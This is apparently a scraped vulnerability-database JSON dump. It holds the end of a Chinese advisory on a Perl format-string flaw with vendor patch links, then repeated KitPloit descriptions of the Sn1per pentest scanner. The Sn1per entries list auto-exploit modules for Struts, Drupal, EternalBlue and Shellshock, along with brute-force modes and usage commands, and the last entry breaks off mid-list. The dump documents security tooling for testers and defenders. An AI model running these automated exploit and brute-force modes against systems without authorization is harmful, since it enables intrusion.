8cf1966a2428838c58f0fab423b8e16a\r\n\r\n\u8865\u4e01\u5b89\u88c5\u65b9\u6cd5\uff1a\r\n\r\n1. \u624b\u5de5\u5b89\u88c5\u8865\u4e01\u5305\uff1a\r\n\r\n \u9996\u5148\uff0c\u4f7f\u7528\u4e0b\u9762\u7684\u547d\u4ee4\u6765\u4e0b\u8f7d\u8865\u4e01\u8f6f\u4ef6\uff1a\r\n # wget url (url\u662f\u8865\u4e01\u4e0b\u8f7d\u94fe\u63a5\u5730\u5740)\r\n\r\n \u7136\u540e\uff0c\u4f7f\u7528\u4e0b\u9762\u7684\u547d\u4ee4\u6765\u5b89\u88c5\u8865\u4e01\uff1a \r\n # dpkg -i file.deb (file\u662f\u76f8\u5e94\u7684\u8865\u4e01\u540d)\r\n\r\n2. \u4f7f\u7528apt-get\u81ea\u52a8\u5b89\u88c5\u8865\u4e01\u5305\uff1a\r\n\r\n \u9996\u5148\uff0c\u4f7f\u7528\u4e0b\u9762\u7684\u547d\u4ee4\u66f4\u65b0\u5185\u90e8\u6570\u636e\u5e93\uff1a\r\n # apt-get update\r\n \r\n \u7136\u540e\uff0c\u4f7f\u7528\u4e0b\u9762\u7684\u547d\u4ee4\u5b89\u88c5\u66f4\u65b0\u8f6f\u4ef6\u5305\uff1a\r\n # apt-get upgrade\r\n\r\nHP\r\n--\r\nHP\u5df2\u7ecf\u4e3a\u6b64\u53d1\u5e03\u4e86\u4e00\u4e2a\u5b89\u5168\u516c\u544a\uff08HPSBTU02125\uff09\u4ee5\u53ca\u76f8\u5e94\u8865\u4e01:\r\nHPSBTU02125\uff1aSSRT061105 rev.1 - HP Tru64 UNIX Running Perl 5.8.2 and earlier, Local Unauthorized Code Execution\r\n\u94fe\u63a5\uff1a<a href=\"http://www2.itrc.hp.com/service/cki/docDisplay.do?docId=c00686865&hpweb_printable=true\" target=\"_blank\">http://www2.itrc.hp.com/service/cki/docDisplay.do?docId=c00686865&hpweb_printable=true</a>\r\n\r\nRedHat\r\n------\r\nRedHat\u5df2\u7ecf\u4e3a\u6b64\u53d1\u5e03\u4e86\u5b89\u5168\u516c\u544a\uff08RHSA-2005:880-01\uff0cRHSA-2005:881-01\uff09\u4ee5\u53ca\u76f8\u5e94\u8865\u4e01:\r\nRHSA-2005:880-01\uff1aModerate: perl security update\r\n\u94fe\u63a5\uff1a<a href=\"http://lwn.net/Alerts/165025/?format=printable\" target=\"_blank\">http://lwn.net/Alerts/165025/?format=printable</a>\r\n\r\nRHSA-2005:881-01\uff1aModerate: perl security update\r\n\u94fe\u63a5\uff1a<a href=\"http://lwn.net/Alerts/165026/?format=printable\" target=\"_blank\">http://lwn.net/Alerts/165026/?format=printable</a>\r\n\r\nSGI\r\n---\r\nSGI\u5df2\u7ecf\u4e3a\u6b64\u53d1\u5e03\u4e86\u4e00\u4e2a\u5b89\u5168\u516c\u544a\uff0820060101-01-U\uff09\u4ee5\u53ca\u76f8\u5e94\u8865\u4e01:\r\n20060101-01-U\uff1aSGI Advanced Linux Environment 3 Security Update #53\r\n\u94fe\u63a5\uff1a<a href=\"ftp://patches.sgi.com/support/free/security/advisories/20060101-01-U.asc\" target=\"_blank\">ftp://patches.sgi.com/support/free/security/advisories/20060101-01-U.asc</a>\r\n\r\nSun\r\n---\r\nSun\u5df2\u7ecf\u4e3a\u6b64\u53d1\u5e03\u4e86\u4e00\u4e2a\u5b89\u5168\u516c\u544a\uff08Sun-Alert-102192\uff09\u4ee5\u53ca\u76f8\u5e94\u8865\u4e01:\r\nSun-Alert-102192\uff1aInteger Overflow Vulnerability in Perl May Lead to Application Crash or Code Execution\r\n\u94fe\u63a5\uff1a<a href=\"http://sunsolve.sun.com/search/printfriendly.do?assetkey=1-26-102192-1\" target=\"_blank\">http://sunsolve.sun.com/search/printfriendly.do?assetkey=1-26-102192-1</a>\r\n\r\nWebmin\r\n------\r\n\u76ee\u524d\u5382\u5546\u5df2\u7ecf\u53d1\u5e03\u4e86\u5347\u7ea7\u8865\u4e01\u4ee5\u4fee\u590d\u8fd9\u4e2a\u5b89\u5168\u95ee\u9898\uff0c\u8bf7\u5230\u5382\u5546\u7684\u4e3b\u9875\u4e0b\u8f7d\uff1a\r\n\r\n* Webmin Upgrade webmin-1.250.tar.gz\r\n<a href=\"http://prdownloads.sourceforge.net/webadmin/webmin-1.250.tar.gz\" target=\"_blank\">http://prdownloads.sourceforge.net/webadmin/webmin-1.250.tar.gz</a>\r\n\r\n* Webmin Upgrade usermin-1.180.tar.gz\r\n<a href=\"http://prdownloads.sourceforge.net/webadmin/usermin-1.180.tar.gz\" target=\"_blank\">http://prdownloads.sourceforge.net/webadmin/usermin-1.180.tar.gz</a>\r\n\r\nGentoo\r\n------\r\nGentoo\u5df2\u7ecf\u4e3a\u6b64\u53d1\u5e03\u4e86\u4e00\u4e2a\u5b89\u5168\u516c\u544a\uff08GLSA-200512-01\uff09\u4ee5\u53ca\u76f8\u5e94\u8865\u4e01:\r\nGLSA-200512-01\uff1aPerl: Format string errors can lead to code execution\r\n\u94fe\u63a5\uff1a<a href=\"http://security.gentoo.org/glsa/glsa-200512-01.xml\" target=\"_blank\">http://security.gentoo.org/glsa/glsa-200512-01.xml</a>\r\n\r\n\u6240\u6709Perl\u7528\u6237\u90fd\u5e94\u5347\u7ea7\u5230\u6700\u65b0\u7248\u672c:\r\n\r\n # emerge --sync\r\n # emerge --ask --oneshot --verbose dev-lang/perl", "published": "2006-11-30T00:00:00", "type": "seebug", "title": "Perl\u683c\u5f0f\u4e32\u5904\u7406\u6574\u6570\u6ea2\u51fa\u6f0f\u6d1e", "bulletinFamily": "exploit", "cvelist": ["CVE-2005-3912", "CVE-2005-3962"], "modified": "2006-11-30T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-630", "id": "SSV:630", "sourceData": "", "sourceHref": "", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "kitploit": [{"lastseen": "2020-12-08T15:25:01", "bulletinFamily": "tools", "cvelist": ["CVE-2018-7600", "CVE-2006-3392", "CVE-2009-3843", "CVE-2018-10561", "CVE-2017-5638", "CVE-2014-0160", "CVE-2017-9805", "CVE-2014-6271"], "description": "[  ](<https://4.bp.blogspot.com/-P3_9VWnPhLw/WzvPRBF6q3I/AAAAAAAALtk/nE4XtcDGmXELo4KLTzEDoCiNMEgF0VJAACLcBGAs/s1600/Sn1per_1_Sn1per.jpeg>)\n\n \n\n\nSn1per Community Edition is an [ automated scanner ](<https://www.kitploit.com/search/label/Automated%20scanner>) that can be used during a [ penetration test ](<https://www.kitploit.com/search/label/Penetration%20Test>) to enumerate and scan for vulnerabilities. Sn1per Professional is Xero Security's premium reporting addon for Professional Penetration Testers, Bug Bounty Researchers and Corporate Security teams to manage large environments and pentest scopes. \n\n \n** SN1PER PROFESSIONAL FEATURES: ** \n \n** Professional reporting interface ** \n \n\n\n[  ](<https://3.bp.blogspot.com/-CUaHGxKs7i8/WzvPDvnvnUI/AAAAAAAALtg/6NzvIUFvET0YO8X9SXkxbSXD51R9dgn_QCLcBGAs/s1600/Sn1per_8.png>)\n\n \n** Slideshow for all gathered screenshots ** \n \n\n\n[  ](<https://3.bp.blogspot.com/-ElnqBSUrveU/WzvPZw0s4FI/AAAAAAAALto/xOUximDoNkMni5XhkzmMDnI9caTUWdo3gCLcBGAs/s1600/Sn1per_9.png>)\n\n \n** Searchable and sortable DNS, IP and open port database ** \n \n\n\n[  ](<https://3.bp.blogspot.com/-U5MHC2iK1ag/WzvPfoIz6nI/AAAAAAAALts/m-GOz4roSSEhYjSeZgakgEJxo4-xCSlIQCLcBGAs/s1600/Sn1per_10.png>)\n\n \n \n** Categorized host reports ** \n \n\n\n[  ](<https://4.bp.blogspot.com/-b82btbNLylE/WzvPj6ds37I/AAAAAAAALt0/KgxDw1g6rCgCuDamA3v_GBIHTAs-No2DwCLcBGAs/s1600/Sn1per_11.png>)\n\n \n \n** Quick links to online recon tools and Google hacking queries ** \n \n\n\n[  ](<https://4.bp.blogspot.com/-eB0eLBg1-Xs/WzvPsgtbmGI/AAAAAAAALt8/FSkOuUJlOb0YXRetzL4TYbuLeOmRaQtOwCLcBGAs/s1600/Sn1per_12.png>)\n\n \n** Personalized notes field for each host ** \n \n\n\n[  ](<https://1.bp.blogspot.com/-4SndSkZX88U/WzvPxUain4I/AAAAAAAALuE/x7ZucGGcTPIOGerWwlbWvXrFVosouiOhwCLcBGAs/s1600/Sn1per_13.png>)\n\n \n \n** DEMO VIDEO: ** \n[  ](<https://asciinema.org/a/IDckE48BNSWQ8TV8yEjJjjMNm>) \n \n** SN1PER COMMUNITY FEATURES: ** \n\n\n * * Automatically collects basic recon (ie. whois, ping, DNS, etc.) \n * Automatically launches Google hacking queries against a target domain \n * Automatically enumerates open ports via NMap port scanning \n * Automatically brute forces sub-domains, gathers DNS info and checks for zone transfers \n * Automatically checks for sub-domain hijacking \n * Automatically runs targeted NMap scripts against open ports \n * Automatically runs targeted Metasploit scan and exploit modules \n * Automatically scans all web applications for common vulnerabilities \n * Automatically brute forces ALL open services \n * Automatically test for anonymous FTP access \n * Automatically runs WPScan, Arachni and Nikto for all web services \n * Automatically enumerates NFS shares \n * Automatically test for anonymous LDAP access \n * Automatically enumerate SSL/TLS ciphers, protocols and vulnerabilities \n * Automatically enumerate SNMP community strings, services and users \n * Automatically list SMB users and shares, check for NULL sessions and exploit MS08-067 \n * Automatically exploit vulnerable JBoss, Java RMI and Tomcat servers \n * Automatically tests for open X11 servers \n * Auto-pwn added for Metasploitable, ShellShock, MS08-067, Default Tomcat Creds \n * Performs high level enumeration of multiple hosts and subnets \n * Automatically integrates with Metasploit Pro, MSFConsole and Zenmap for reporting \n * Automatically gathers screenshots of all web sites \n * Create individual workspaces to store all scan output \n \n** AUTO-PWN: ** \n\n\n * Drupal Drupalgedon2 RCE CVE-2018-7600 \n * GPON Router RCE CVE-2018-10561 \n * [ Apache Struts ](<https://www.kitploit.com/search/label/Apache%20Struts>) 2 RCE CVE-2017-5638 \n * Apache Struts 2 RCE CVE-2017-9805 \n * Apache Jakarta RCE CVE-2017-5638 \n * Shellshock GNU Bash RCE CVE-2014-6271 \n * HeartBleed OpenSSL Detection CVE-2014-0160 \n * Default Apache Tomcat Creds CVE-2009-3843 \n * MS Windows SMB RCE MS08-067 \n * Webmin File Disclosure CVE-2006-3392 \n * [ Anonymous FTP ](<https://www.kitploit.com/search/label/Anonymous%20FTP>) Access \n * PHPMyAdmin Backdoor RCE \n * PHPMyAdmin Auth Bypass \n * JBoss Java De-Serialization RCE's \n \n** KALI LINUX INSTALL: ** \n\n \n \n ./install.sh\n\n \n** DOCKER INSTALL: ** \nCredits: @menzow \nDocker Install: [ https://github.com/menzow/sn1per-docker ](<https://github.com/menzow/sn1per-docker>) \nDocker Build: [ https://hub.docker.com/r/menzo/sn1per-docker/builds/bqez3h7hwfun4odgd2axvn4/ ](<https://hub.docker.com/r/menzo/sn1per-docker/builds/bqez3h7hwfun4odgd2axvn4/>) \nExample usage: \n\n \n \n $ docker pull menzo/sn1per-docker\n $ docker run --rm -ti menzo/sn1per-docker sniper menzo.io\n\n \n** USAGE: ** \n\n \n \n [*] NORMAL MODE\n sniper -t|--target <TARGET>\n \n [*] NORMAL MODE + OSINT + RECON\n sniper -t|--target <TARGET> -o|--osint -re|--recon\n \n [*] STEALTH MODE + OSINT + RECON\n sniper -t|--target <TARGET> -m|--mode stealth -o|--osint -re|--recon\n \n [*] DISCOVER MODE\n sniper -t|--target <CIDR> -m|--mode discover -w|--workspace <WORSPACE_ALIAS>\n \n [*] SCAN ONLY SPECIFIC PORT\n sniper -t|--target <TARGET> -m port -p|--port <portnum>\n \n [*] FULLPORTONLY SCAN MODE\n sniper -t|--target <TARGET> -fp|--fullportonly\n \n [*] PORT SCAN MODE\n sniper -t|--target <TARGET> -m|--mode port -p|--port <PORT_NUM>\n \n [*] WEB MODE - PORT 80 + 443 ONLY!\n sniper -t|--target <TARGET> -m|--mode web\n \n [*] HTTP WEB PORT MODE\n sniper -t|--target <TARGET> -m|--mode webporthttp -p|--port <port>\n \n [*] HTTPS WEB PORT MODE\n sniper -t|--target <TARGET> -m|--mode webporthttps -p|--port <port>\n \n [*] ENABLE BRUTEFORCE\n sniper -t|--target <TARGET> -b|--bruteforce\n \n [*] AIRSTRIKE MODE\n sniper -f|--file /full/path/to/targets.txt -m|--mode airstrike\n \n [*] NUKE MODE WITH TARGET LIST, BRUTEFORCE ENABLED, FULLPORTSCAN ENABLED, OSINT ENABLED, RECON ENABLED, WORKSPACE & LOOT ENABLED\n sniper -f--file /full/path/to/targets.txt -m|--mode nuke -w|--workspace <WORKSPACE_ALIAS>\n \n [*] ENABLE LOOT IMPORTING INTO METASPLOIT\n sniper -t|--target <TARGET>\n \n [*] LOOT REIMPORT FUNCTION\n sniper -w <WORKSPACE_ALIAS> --reimport\n \n [*] UPDATE SNIPER\n sniper -u|--update\n\n \n** MODES: ** \n\n\n * ** NORMAL: ** Performs basic scan of targets and open ports using both active and passive checks for optimal performance. \n * ** STEALTH: ** Quickly enumerate single targets using mostly non-intrusive scans to avoid WAF/IPS blocking. \n * ** AIRSTRIKE: ** Quickly enumerates open ports/services on multiple hosts and performs basic fingerprinting. To use, specify the full location of the file which contains all hosts, IPs that need to be scanned and run ./sn1per /full/path/to/targets.txt airstrike to begin scanning. \n * ** NUKE: ** Launch full audit of multiple hosts specified in text file of choice. Usage example: ./sniper /pentest/loot/targets.txt nuke. \n * ** DISCOVER: ** Parses all hosts on a subnet/CIDR (ie. 192.168.0.0/16) and initiates a sniper scan against each host. Useful for internal network scans. \n * ** PORT: ** Scans a specific port for vulnerabilities. Reporting is not currently available in this mode. \n * ** FULLPORTONLY: ** Performs a full detailed port scan and saves results to XML. \n * ** WEB: ** Adds full automatic web application scans to the results (port 80/tcp & 443/tcp only). Ideal for web applications but may increase scan time significantly. \n * ** WEBPORTHTTP: ** Launches a full HTTP web application scan against a specific host and port. \n * ** WEBPORTHTTPS: ** Launches a full HTTPS web application scan against a specific host and port. \n * ** UPDATE: ** Checks for updates and upgrades all components used by sniper. \n * ** REIMPORT: ** Reimport all workspace files into Metasploit and reproduce all reports. \n * ** RELOAD: ** Reload the master workspace report. \n \n** SAMPLE REPORT: ** \n[ https://gist.github.com/1N3/8214ec2da2c91691bcbc ](<https://gist.github.com/1N3/8214ec2da2c91691bcbc>) \n \n \n\n\n** [ Download Sn1per v5.0 ](<https://github.com/1N3/Sn1per>) **\n", "edition": 26, "modified": "2018-07-05T13:45:01", "published": "2018-07-05T13:45:01", "id": "KITPLOIT:7835941952769002973", "href": "http://www.kitploit.com/2018/07/sn1per-v50-automated-pentest-recon.html", "title": "Sn1per v5.0 - Automated Pentest Recon Scanner", "type": "kitploit", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-08T15:23:48", "bulletinFamily": "tools", "cvelist": ["CVE-2018-7600", "CVE-2006-3392", "CVE-2009-3843", "CVE-2018-10561", "CVE-2017-5638", "CVE-2014-0160", "CVE-2017-9805", "CVE-2014-6271"], "description": "[  ](<https://4.bp.blogspot.com/-P3_9VWnPhLw/WzvPRBF6q3I/AAAAAAAALtk/nE4XtcDGmXELo4KLTzEDoCiNMEgF0VJAACLcBGAs/s1600/Sn1per_1_Sn1per.jpeg>)\n\n \n\n\nSn1per Community Edition is an [ automated scanner ](<https://www.kitploit.com/search/label/Automated%20scanner>) that can be used during a [ penetration test ](<https://www.kitploit.com/search/label/Penetration%20Test>) to enumerate and scan for vulnerabilities. Sn1per Professional is Xero Security's premium reporting addon for Professional Penetration Testers, Bug Bounty Researchers and Corporate Security teams to manage large environments and pentest scopes. \n\n \n** SN1PER PROFESSIONAL FEATURES: ** \n \n** Professional reporting interface ** \n \n\n\n[  ](<https://3.bp.blogspot.com/-CUaHGxKs7i8/WzvPDvnvnUI/AAAAAAAALtg/6NzvIUFvET0YO8X9SXkxbSXD51R9dgn_QCLcBGAs/s1600/Sn1per_8.png>)\n\n \n** Slideshow for all gathered screenshots ** \n \n\n\n[  ](<https://3.bp.blogspot.com/-ElnqBSUrveU/WzvPZw0s4FI/AAAAAAAALto/xOUximDoNkMni5XhkzmMDnI9caTUWdo3gCLcBGAs/s1600/Sn1per_9.png>)\n\n \n** Searchable and sortable DNS, IP and open port database ** \n \n\n\n[  ](<https://3.bp.blogspot.com/-U5MHC2iK1ag/WzvPfoIz6nI/AAAAAAAALts/m-GOz4roSSEhYjSeZgakgEJxo4-xCSlIQCLcBGAs/s1600/Sn1per_10.png>)\n\n \n \n** Categorized host reports ** \n \n\n\n[  ](<https://4.bp.blogspot.com/-b82btbNLylE/WzvPj6ds37I/AAAAAAAALt0/KgxDw1g6rCgCuDamA3v_GBIHTAs-No2DwCLcBGAs/s1600/Sn1per_11.png>)\n\n \n \n** Quick links to online recon tools and Google hacking queries ** \n \n\n\n[  ](<https://4.bp.blogspot.com/-eB0eLBg1-Xs/WzvPsgtbmGI/AAAAAAAALt8/FSkOuUJlOb0YXRetzL4TYbuLeOmRaQtOwCLcBGAs/s1600/Sn1per_12.png>)\n\n \n** Personalized notes field for each host ** \n \n\n\n[  ](<https://1.bp.blogspot.com/-4SndSkZX88U/WzvPxUain4I/AAAAAAAALuE/x7ZucGGcTPIOGerWwlbWvXrFVosouiOhwCLcBGAs/s1600/Sn1per_13.png>)\n\n \n \n** DEMO VIDEO: ** \n[  ](<https://asciinema.org/a/IDckE48BNSWQ8TV8yEjJjjMNm>) \n \n** SN1PER COMMUNITY FEATURES: ** \n\n\n * * Automatically collects basic recon (ie. whois, ping, DNS, etc.) \n * Automatically launches Google hacking queries against a target domain \n * Automatically enumerates open ports via NMap port scanning \n * Automatically brute forces sub-domains, gathers DNS info and checks for zone transfers \n * Automatically checks for sub-domain hijacking \n * Automatically runs targeted NMap scripts against open ports \n * Automatically runs targeted Metasploit scan and exploit modules \n * Automatically scans all web applications for common vulnerabilities \n * Automatically brute forces ALL open services \n * Automatically test for anonymous FTP access \n * Automatically runs WPScan, Arachni and Nikto for all web services \n * Automatically enumerates NFS shares \n * Automatically test for anonymous LDAP access \n * Automatically enumerate SSL/TLS ciphers, protocols and vulnerabilities \n * Automatically enumerate SNMP community strings, services and users \n * Automatically list SMB users and shares, check for NULL sessions and exploit MS08-067 \n * Automatically exploit vulnerable JBoss, Java RMI and Tomcat servers \n * Automatically tests for open X11 servers \n * Auto-pwn added for Metasploitable, ShellShock, MS08-067, Default Tomcat Creds \n * Performs high level enumeration of multiple hosts and subnets \n * Automatically integrates with Metasploit Pro, MSFConsole and Zenmap for reporting \n * Automatically gathers screenshots of all web sites \n * Create individual workspaces to store all scan output \n \n** AUTO-PWN: ** \n\n\n * Drupal Drupalgedon2 RCE CVE-2018-7600 \n * GPON Router RCE CVE-2018-10561 \n * [ Apache Struts ](<https://www.kitploit.com/search/label/Apache%20Struts>) 2 RCE CVE-2017-5638 \n * Apache Struts 2 RCE CVE-2017-9805 \n * Apache Jakarta RCE CVE-2017-5638 \n * Shellshock GNU Bash RCE CVE-2014-6271 \n * HeartBleed OpenSSL Detection CVE-2014-0160 \n * Default Apache Tomcat Creds CVE-2009-3843 \n * MS Windows SMB RCE MS08-067 \n * Webmin File Disclosure CVE-2006-3392 \n * [ Anonymous FTP ](<https://www.kitploit.com/search/label/Anonymous%20FTP>) Access \n * PHPMyAdmin Backdoor RCE \n * PHPMyAdmin Auth Bypass \n * JBoss Java De-Serialization RCE's \n \n** KALI LINUX INSTALL: ** \n\n \n \n ./install.sh\n\n \n** DOCKER INSTALL: ** \nCredits: @menzow \nDocker Install: [ https://github.com/menzow/sn1per-docker ](<https://github.com/menzow/sn1per-docker>) \nDocker Build: [ https://hub.docker.com/r/menzo/sn1per-docker/builds/bqez3h7hwfun4odgd2axvn4/ ](<https://hub.docker.com/r/menzo/sn1per-docker/builds/bqez3h7hwfun4odgd2axvn4/>) \nExample usage: \n\n \n \n $ docker pull menzo/sn1per-docker\n $ docker run --rm -ti menzo/sn1per-docker sniper menzo.io\n\n \n** USAGE: ** \n\n \n \n [*] NORMAL MODE\n sniper -t|--target <TARGET>\n \n [*] NORMAL MODE + OSINT + RECON\n sniper -t|--target <TARGET> -o|--osint -re|--recon\n \n [*] STEALTH MODE + OSINT + RECON\n sniper -t|--target <TARGET> -m|--mode stealth -o|--osint -re|--recon\n \n [*] DISCOVER MODE\n sniper -t|--target <CIDR> -m|--mode discover -w|--workspace <WORSPACE_ALIAS>\n \n [*] SCAN ONLY SPECIFIC PORT\n sniper -t|--target <TARGET> -m port -p|--port <portnum>\n \n [*] FULLPORTONLY SCAN MODE\n sniper -t|--target <TARGET> -fp|--fullportonly\n \n [*] PORT SCAN MODE\n sniper -t|--target <TARGET> -m|--mode port -p|--port <PORT_NUM>\n \n [*] WEB MODE - PORT 80 + 443 ONLY!\n sniper -t|--target <TARGET> -m|--mode web\n \n [*] HTTP WEB PORT MODE\n sniper -t|--target <TARGET> -m|--mode webporthttp -p|--port <port>\n \n [*] HTTPS WEB PORT MODE\n sniper -t|--target <TARGET> -m|--mode webporthttps -p|--port <port>\n \n [*] ENABLE BRUTEFORCE\n sniper -t|--target <TARGET> -b|--bruteforce\n \n [*] AIRSTRIKE MODE\n sniper -f|--file /full/path/to/targets.txt -m|--mode airstrike\n \n [*] NUKE MODE WITH TARGET LIST, BRUTEFORCE ENABLED, FULLPORTSCAN ENABLED, OSINT ENABLED, RECON ENABLED, WORKSPACE & LOOT ENABLED\n sniper -f--file /full/path/to/targets.txt -m|--mode nuke -w|--workspace <WORKSPACE_ALIAS>\n \n [*] ENABLE LOOT IMPORTING INTO METASPLOIT\n sniper -t|--target <TARGET>\n \n [*] LOOT REIMPORT FUNCTION\n sniper -w <WORKSPACE_ALIAS> --reimport\n \n [*] UPDATE SNIPER\n sniper -u|--update\n\n \n** MODES: ** \n\n\n * ** NORMAL: ** Performs basic scan of targets and open ports using both active and passive checks for optimal performance. \n * ** STEALTH: ** Quickly enumerate single targets using mostly non-intrusive scans to avoid WAF/IPS blocking. \n * ** AIRSTRIKE: ** Quickly enumerates open ports/services on multiple hosts and performs basic fingerprinting. To use, specify the full location of the file which contains all hosts, IPs that need to be scanned and run ./sn1per /full/path/to/targets.txt airstrike to begin scanning. \n * ** NUKE: ** Launch full audit of multiple hosts specified in text file of choice. Usage example: ./sniper /pentest/loot/targets.txt nuke. \n * ** DISCOVER: ** Parses all hosts on a subnet/CIDR (ie. 192.168.0.0/16) and initiates a sniper scan against each host. Useful for internal network scans. \n * ** PORT: ** Scans a specific port for vulnerabilities. Reporting is not currently available in this mode. \n * ** FULLPORTONLY: ** Performs a full detailed port scan and saves results to XML. \n * ** WEB: ** Adds full automatic web application scans to the results (port 80/tcp & 443/tcp only). Ideal for web applications but may increase scan time significantly. \n * ** WEBPORTHTTP: ** Launches a full HTTP web application scan against a specific host and port. \n * ** WEBPORTHTTPS: ** Launches a full HTTPS web application scan against a specific host and port. \n * ** UPDATE: ** Checks for updates and upgrades all components used by sniper. \n * ** REIMPORT: ** Reimport all workspace files into Metasploit and reproduce all reports. \n * ** RELOAD: ** Reload the master workspace report. \n \n** SAMPLE REPORT: ** \n[ https://gist.github.com/1N3/8214ec2da2c91691bcbc ](<https://gist.github.com/1N3/8214ec2da2c91691bcbc>) \n \n \n\n\n** [ Download Sn1per v5.0 ](<https://github.com/1N3/Sn1per>) **\n", "edition": 18, "modified": "2018-11-24T12:43:00", "published": "2018-11-24T12:43:00", "id": "KITPLOIT:8672599587089685905", "href": "http://www.kitploit.com/2018/11/sn1per-v60-automated-pentest-framework.html", "title": "Sn1per v6.0 - Automated Pentest Framework For Offensive Security Experts", "type": "kitploit", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-08T17:25:08", "bulletinFamily": "tools", "cvelist": ["CVE-2017-7269", "CVE-2018-7600", "CVE-2006-3392", "CVE-2009-3843", "CVE-2018-10561", "CVE-2017-5638", "CVE-2017-10271", "CVE-2018-11776", "CVE-2014-0160", "CVE-2017-9805", "CVE-2015-8249", "CVE-2014-6271", "CVE-2017-12617"], "description": "[  ](<https://1.bp.blogspot.com/-Poffj1hNPBk/XNXfkZuyGfI/AAAAAAAAO0U/k4nQgdLXOoEZMOGlGb3wgnx8HgQzEtacgCLcBGAs/s1600/Sn1per_1_Sn1per.jpeg>)\n\n \n\n\nSn1per Community Edition is an [ automated scanner ](<https://www.kitploit.com/search/label/Automated%20scanner> \"automated scanner\" ) that can be used during a [ penetration test ](<https://www.kitploit.com/search/label/Penetration%20Test> \"penetration test\" ) to enumerate and scan for vulnerabilities. Sn1per Professional is Xero Security's premium reporting addon for Professional Penetration Testers, Bug Bounty Researchers and Corporate Security teams to manage large environments and pentest scopes. For more information regarding Sn1per Professional, go to [ https://xerosecurity.com ](<https://xerosecurity.com/> \"https://xerosecurity.com\" ) . \n\n \n** SN1PER PROFESSIONAL FEATURES: ** \n \n** Professional reporting interface ** \n \n\n\n[  ](<https://2.bp.blogspot.com/-HnwS8O0KEik/XNXfrGJWPeI/AAAAAAAAO0Y/94Hl4CC3M_kytYKkKldzXNviz4ff92TVACLcBGAs/s1600/Sn1per_8.png>)\n\n \n** Slideshow for all gathered screenshots ** \n \n\n\n[  ](<https://2.bp.blogspot.com/-coOpsZX0XMM/XNXfuVNicUI/AAAAAAAAO0c/Wd2EQSAcI4Uti3bkaa1kxqajpStfjTK0ACLcBGAs/s1600/Sn1per_9.png>)\n\n \n** Searchable and sortable DNS, IP and open port database ** \n \n\n\n[  ](<https://4.bp.blogspot.com/-bfzb6vLbCks/XNXfy5vfkTI/AAAAAAAAO0g/9aO7_9YKrqMyWK3PehtfItlm4DZ6KWR4gCLcBGAs/s1600/Sn1per_10.png>)\n\n \n** Detailed host reports ** \n \n\n\n[  ](<https://4.bp.blogspot.com/-JbxR5Z-2O_4/XNXf2YbT_DI/AAAAAAAAO0o/w8Hin6Cbf1Ue4QbVW70T2-r1Rj82wDsSQCLcBGAs/s1600/Sn1per_11.png>)\n\n \n** NMap HTML host reports ** \n \n\n\n[  ](<https://2.bp.blogspot.com/-TYr4tFOy7Y4/XNXf7dXeSII/AAAAAAAAO0w/0YMKst5KHGoygojHG2r6tJxqkg2a-w1YQCLcBGAs/s1600/Sn1per_12.png>)\n\n \n** Quick links to online recon tools and Google hacking queries ** \n \n\n\n[  ](<https://1.bp.blogspot.com/-FNe1YF5mg68/XNXgAPQOAEI/AAAAAAAAO00/5uuuQo2KqRgwpTE11Z-U6p_XGetjCf9vgCLcBGAs/s1600/Sn1per_13.png>)\n\n \n** Takeovers and Email Security ** \n \n\n\n[  ](<https://2.bp.blogspot.com/-FNah2OwM_nU/XNXgEeJZG9I/AAAAAAAAO08/A7lu1554nJ0GpEOj7AtdZ_emSoyq5lBxQCLcBGAs/s1600/Sn1per_14.png>)\n\n \n** HTML5 Notepad ** \n \n\n\n[  ](<https://2.bp.blogspot.com/-DHOnECOz-T0/XNXgH_QX4JI/AAAAAAAAO1E/s0bFVC-Uf_87tBFY2AJwiJyHgKJ8VgKXQCLcBGAs/s1600/Sn1per_15.png>)\n\n \n** ORDER SN1PER PROFESSIONAL: ** \nTo obtain a Sn1per Professional license, go to [ https://xerosecurity.com ](<https://xerosecurity.com/> \"https://xerosecurity.com\" ) . \n \n** DEMO VIDEO: ** \n \n \n\n\n[  ](<https://asciinema.org/a/IDckE48BNSWQ8TV8yEjJjjMNm>)\n\n \n \n** SN1PER COMMUNITY FEATURES: ** \n\n\n * Automatically collects basic recon (ie. whois, ping, DNS, etc.) \n * Automatically launches Google hacking queries against a target domain \n * Automatically enumerates open ports via NMap port scanning \n * Automatically brute forces sub-domains, gathers DNS info and checks for zone transfers \n * Automatically checks for sub-domain hijacking \n * Automatically runs targeted NMap scripts against open ports \n * Automatically runs targeted Metasploit scan and exploit modules \n * Automatically scans all web applications for common vulnerabilities \n * Automatically brute forces ALL open services \n * Automatically test for anonymous FTP access \n * Automatically runs WPScan, Arachni and Nikto for all web services \n * Automatically enumerates NFS shares \n * Automatically test for anonymous LDAP access \n * Automatically enumerate SSL/TLS ciphers, protocols and vulnerabilities \n * Automatically enumerate SNMP community strings, services and users \n * Automatically list SMB users and shares, check for NULL sessions and exploit MS08-067 \n * Automatically exploit vulnerable JBoss, Java RMI and Tomcat servers \n * Automatically tests for open X11 servers \n * Auto-pwn added for Metasploitable, ShellShock, MS08-067, Default Tomcat Creds \n * Performs high level enumeration of multiple hosts and subnets \n * Automatically integrates with Metasploit Pro, MSFConsole and Zenmap for reporting \n * Automatically gathers screenshots of all web sites \n * Create individual workspaces to store all scan output \n \n** EXPLOITS: ** \n\n\n * Drupal RESTful Web Services unserialize() SA-CORE-2019-003 \n * Apache Struts: S2-057 (CVE-2018-11776): Security updates available for Apache Struts \n * Drupal: CVE-2018-7600: [ Remote Code Execution ](<https://www.kitploit.com/search/label/Remote%20Code%20Execution> \"Remote Code Execution\" ) \\- SA-CORE-2018-002 \n * GPON Routers - Authentication Bypass / [ Command Injection ](<https://www.kitploit.com/search/label/Command%20Injection> \"Command Injection\" ) CVE-2018-10561 \n * MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption \n * Apache Tomcat: Remote Code Execution (CVE-2017-12617) \n * Oracle WebLogic wls-wsat Component Deserialization Remote Code Execution CVE-2017-10271 \n * Apache Struts Content-Type arbitrary command execution (CVE-2017-5638) \n * Apache Struts 2 Framework Checks - REST plugin with XStream handler (CVE-2017-9805) \n * Apache Struts Content-Type arbitrary command execution (CVE-2017-5638) \n 